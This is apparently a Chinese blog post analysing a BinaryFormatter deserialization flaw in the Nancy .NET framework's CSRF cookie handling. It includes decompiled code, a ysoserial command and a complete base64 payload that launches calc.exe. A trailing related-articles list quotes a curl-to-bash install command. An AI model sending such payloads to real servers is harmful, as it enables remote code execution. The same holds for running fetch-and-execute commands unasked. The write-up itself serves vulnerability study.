Nancy 反序列化漏洞分析

原創 ice_0e3 2022-09-14 13:10

Nancy 反序列化漏洞分析

前言

找一個有意思的NET反序列化案例來看看,水篇文

漏洞分析

Github下載https://github.com/NancyFx/Nancy.Demo.Samples

運行啓動

image-20220913010257584

部分工具類在dll中,封裝成dll進行引用

image-20220913010351212

漏洞代碼位於 Nancy.Security.Enable中,在項目初始化的時候調用Initialize方法進行啓用csrf模塊功能

image-20220913010719917

image-20220913010735903

if (context.Response == null || context.Response.Cookies == null)
				{
					return;
				}
				if (context.Items.ContainsKey("NCSRF"))
				{
					context.Response.Cookies.Add(new NancyCookie("NCSRF", (string)context.Items["NCSRF"], true));
					return;
				}
				if (context.Request.Cookies.ContainsKey("NCSRF"))
				{
					string text = HttpUtility.UrlDecode(context.Request.Cookies["NCSRF"]);
					CsrfToken cookieToken = CsrfApplicationStartup.ObjectSerializer.Deserialize(text) as CsrfToken;

判斷Cooie 中是否NCSRFNCSRF值,有的話獲取COOKIE中的NCSRF值,進行url解碼,隨後進行反序列化爲CsrfToken

image-20220913011012521

public object Deserialize(string sourceString)
		{
			if (string.IsNullOrEmpty(sourceString))
			{
				return null;
			}
			object result;
			try
			{
				byte[] buffer = Convert.FromBase64String(sourceString);
				BinaryFormatter binaryFormatter = new BinaryFormatter();
				using (MemoryStream memoryStream = new MemoryStream(buffer, false))
				{
					result = binaryFormatter.Deserialize(memoryStream);
				}
			}

讀取cookie 中NCSRF內容base64解密後使用BinaryFormatter進行反序列化操作。

那麼下面來構造POC

ysoserial.exe -f binaryformatter -g  RolePrincipal --minify -c "calc.exe"

AAEAAAD/////AQAAAAAAAAAMAgAAAEpTeXN0ZW0uV2ViLFZlcnNpb249NC4wLjAuMCxDdWx0dXJlPW5ldXRyYWwsUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYQUBAAAAIVN5c3RlbS5XZWIuU2VjdXJpdHkuUm9sZVByaW5jaXBhbAEAAAAqU3lzdGVtLlNlY3VyaXR5LkNsYWltc1ByaW5jaXBhbC5JZGVudGl0aWVzAQIAAAAGAwAAAMwFQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFCdE5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSUZBUUFBQUVKTmFXTnliM052Wm5RdVZtbHpkV0ZzVTNSMVpHbHZMbFJsZUhRdVJtOXliV0YwZEdsdVp5NVVaWGgwUm05eWJXRjBkR2x1WjFKMWJsQnliM0JsY25ScFpYTUJBQUFBRDBadmNtVm5jbTkxYm1SQ2NuVnphQUVDQUFBQUJnTUFBQUQrQWp4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJZ1RXVjBhRzlrVG1GdFpUMGlVM1JoY25RaUlIaHRiRzV6UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkM5d2NtVnpaVzUwWVhScGIyNGlJSGh0Ykc1ek9tRTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJK1BFOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OFlUcFFjbTlqWlhOelBqeGhPbEJ5YjJObGMzTXVVM1JoY25SSmJtWnZQanhoT2xCeWIyTmxjM05UZEdGeWRFbHVabThnUVhKbmRXMWxiblJ6UFNJdll5QmpZV3hqTG1WNFpTSWdSbWxzWlU1aGJXVTlJbU50WkNJdlBqd3ZZVHBRY205alpYTnpMbE4wWVhKMFNXNW1iejQ4TDJFNlVISnZZMlZ6Y3o0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL

image-20220913011259919

響應500但是命令執行成功了。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Qt/C++音視頻開發71-指定mjpeg/h264格式採集本地攝像頭/存儲文件到mp4/設備推流/採集推流

一、前言 用ffmpeg採集本地攝像頭,如果不指定格式的話,默認小分辨率比如640x480使用rawvideo格式,大分辨率比如1280x720使用mjpeg格式,當然前提是這個攝像頭設備要支持這些格式。目前市面上有一些廠家做的本地設備支持

飛揚青雲 2024-04-25 14:40:54

git命令下,mac環境下載依賴相關報錯問題解決方案

1.安裝fundry框架curl -L https://foundry.paradigm.xyz | bash 2.寫入環境變量source /Users/xx/.bashrc 3.foundryup 問題1報錯:致命錯誤:無法訪問 'h

西紅柿愛喫馬鈴薯 2024-04-25 14:40:34

Python函數參數爲列表問題

def ADD(a): print(3,a,hex(id(a))) a.remove(2) print(3,a,hex(id(a))) a=a.append(10)

Danlis 2024-04-25 14:39:54

使用 NestJS 和 qrcode.js 創建 QR 碼生成器 API

前言 QR碼(Quick Response Code)是一種二維碼,於1994年開發。它能快速存儲和識別數據,包含黑白方塊圖案,常用於掃描獲取信息。QR碼具有高容錯性和快速讀取的優點,廣泛應用於廣告、支付、物流等領域。通過掃描QR碼,用戶可

葡萄城技術團隊 2024-04-25 14:39:44

ebpf在Android安全上的應用:ebpf的一些基礎知識(上篇)

ebpf在Android安全上的應用:ebpf的一些基礎知識(上篇) 一、ebpf介紹 eBPF 是一項革命性的技術,起源於 Linux 內核,它可以在特權上下文中(如操作系統內核)運行沙盒程序。它用於安全有效地擴展內核的功能,而無需通過更

windy_2 2024-04-25 14:36:53

CIRCLEQ_INSERT_AFTER, C語言循環隊列

  CMakeLists.txt # CMakeList.txt : CMake project for llist, include source and define # project specific logic here. #

mingzhanghui 2024-04-25 14:34:32

[MDP.BlazorCore] 快速建立跨Web、App執行的BlazorApp專案

團隊資源受限的時候,使用Blazor開發應用系統,只需開發一份程式碼及使用一種程式語言,就同時產出Web跟App應用系統。 本篇文章,紀錄使用MDP.BlazorCore所提供的樣板,快速建立跨Web、App執行的BlazorApp專案。為

Clark159 2024-04-25 14:32:42

Hessian矩陣以及在血管增強中的應用——OpenCV實現【2024年更新】

有別於廣爲人知的Sobel、Canny等一階算法,基於Hessian矩陣能夠得到圖像二階結果,這將幫助我們深入分析圖像本質。 Hessian矩陣在圖像處理中有着廣泛的應用:其中在圖像分割領域,包括邊緣檢測、紋理分析等;在圖像增強領域,包括邊

jsxyhelu 2024-04-25 14:32:02

七天.NET 8操作SQLite入門到實戰 - (2)第七天Blazor班級管理頁面編寫和接口對接

前言 上一章節我們引入BootstrapBlazor UI組件完成了EasySQLite後臺界面的基本架子的搭建,本章節的主要內容是Blazor班級管理頁面編寫和接口對接。 七天.NET 8 操作 SQLite 入門到實戰詳細教程 第一天

追逐時光 2024-04-25 14:30:41

WPF開源輕便、快速的桌面啓動器

前言 今天大姚給大家分享一款WPF開源、簡單、輕便、快速的桌面啓動器(支持多主題、多語言:簡體中文、繁體中文、英文等):CurvaLauncher。 WPF介紹 WPF 是一個強大的桌面應用程序框架,用於構建具有豐富用戶界面的 Window

追逐時光 2024-04-25 14:30:41

MySQL 分庫分表方案,總結太全了。。

來源:https://www.cnblogs.com/405845829qq/p/7552736.html 前言 公司最近在搞服務分離,數據切分方面的東西,因爲單張包裹表的數據量實在是太大,並且還在以每天60W的量增長。 之前瞭解過數據庫的

Java技術棧 2024-04-25 14:30:11

公司來了個新同事,把 DDD 運用得爐火純青!

前言 我們生活中都聽說了DDD,也瞭解了DDD,那麼怎麼將一個新項目從頭開始按照DDD的過程進行劃分與架構設計呢? 一、專業術語 各種服務 IAAS:基礎設施服務,Infrastructure-as-a-service PAAS:平臺服務

Java技術棧 2024-04-25 14:30:11

抖音的倒水問題, 計算機bfs求解

暴力求解 bfs方法.並且找到的一定是最少步驟 問題: 抖音上面又來了一個倒水遊戲 例子: 3個杯子, 容量12, 9, 5 上來12是滿的. 然後都沒有刻度只能倒到一個滿這種倒法, 然後最後希望倒出2個6ml的. # 抖音上面又來了一個倒

張博的博客 2024-04-25 14:28:41

tar和zip包加密解密壓縮

    1、概述 嗯,最近有些機密文件無處安放,因爲太機密了,後來確定加密後放到服務器上。研究一番後發現tar和zip命令都能實現,所以在此記錄一下。 壓縮:tar -zcvf - ./packageTest | openssl des3

馬昌偉 2024-04-25 14:22:40

解決mysql 事務死鎖的方法

使用以下命令查看引擎的狀態 SHOW ENGINE INNODB STATUS;   如果有事務死鎖可以看到如下圖的關鍵字   找到上圖的線程id 使用 kill 57763 .解決問題。 問題回放,事務死鎖如何產生? 本地調試

雨V幕 2024-04-25 14:22:00